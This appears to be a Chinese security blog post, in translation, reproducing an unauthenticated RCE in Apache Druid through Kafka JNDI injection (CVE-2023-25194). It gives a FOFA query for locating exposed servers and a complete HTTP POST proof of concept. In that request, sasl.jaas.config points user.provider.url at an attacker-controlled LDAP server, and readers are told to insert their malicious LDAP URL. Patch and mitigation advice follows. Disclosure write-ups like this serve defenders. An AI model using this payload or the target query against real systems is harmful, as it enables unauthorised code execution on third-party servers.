Apache Druid RCE vulnerability recurrence (QVD-2023-9629)

0x01 Product Introduction

   Apache Druid is a high-performance real-time big data analysis engine that supports fast data ingestion, real-time query and data visualization. It is mainly used in OLAP (Online Analytical Processing) scenarios and can process PB-level data. Druid has the characteristics of high scalability, low latency and high throughput, and is widely used in real-time monitoring, event-driven analysis, user behavior analysis, network security and other fields. By using Druid, enterprises and developers can quickly obtain real-time analysis results and improve decision-making efficiency.

0x02 Vulnerability Overview

In the scenario where Apache Druid uses Apache Kafka to load data, an unauthenticated remote attacker can configure Kafka connection properties, thereby exploiting the CVE-2023-25194 vulnerability to trigger JNDI injection and eventually execute arbitrary code. (Other products using Apache Kafka Connect may also be affected by the CVE-2023-25194 vulnerability)

0x03 range of influence

Affected version

0.19.0 <= Apache Druid <= 25.0.0

unaffected version

Apache Druid >= 26.0.0 (the fix has not yet been officially released)

0x04 Recurrence environment

FOFA syntax: title="Apache Druid"

The reproduced version is: 24.0.1 

0x05 Vulnerability Reappearance

Access to the vulnerable environment

 Fill in any characters, click apply, and burp captures packets

POC:

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1437
Connection: close

{
    "type":"kafka",
    "spec":{
        "type":"kafka",
        "ioConfig":{
            "type":"kafka",
            "consumerProperties":{
                "bootstrap.servers":"1.1.1.1:9092",
                "sasl.mechanism":"SCRAM-SHA-256",
                "security.protocol":"SASL_SSL",
                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://x.x.x.x\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
            },
            "topic":"any",
            "useEarliestOffset":true,
            "inputFormat":{
                "type":"regex",
                "pattern":"([\\s\\S]*)",
                "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                "columns":[
                    "raw"
                ]
            }
        },
        "dataSchema":{
            "dataSource":"sample",
            "timestampSpec":{
                "column":"!!!_no_such_column_!!!",
                "missingValue":"1970-01-01T00:00:00Z"
            },
            "dimensionsSpec":{

            },
            "granularitySpec":{
                "rollup":false
            }
        },
        "tuningConfig":{
            "type":"kafka"
        }
    },
    "samplerConfig":{
        "numRows":500,
        "timeoutMs":15000
    }
}

Modify the request package, fill in your malicious ldap service url at user.provider.url

Use DNSlog to verify the existence of vulnerabilities

 Vulnerabilities exist

 0x06 Repair suggestion

  security update

At present, the official Apache Druid has temporarily fixed this vulnerability, but the new version has not been officially released. Users can download the source code and compile it.

Users can continue to pay attention to the release of the official new version of Apache Druid and update it in time.

Reference: https://github.com/apache/druid/tree/26.0.0

   Mitigation

1. Enable authentication configuration for Apache Druid.

For details, please see: https://druid.apache.org/docs/latest/development/extensions-core/druid-basic-security.html

2. Move Apache Druid to the intranet if the business permits.

 

 

Guess you like

Origin blog.csdn.net/qq_41904294/article/details/130379299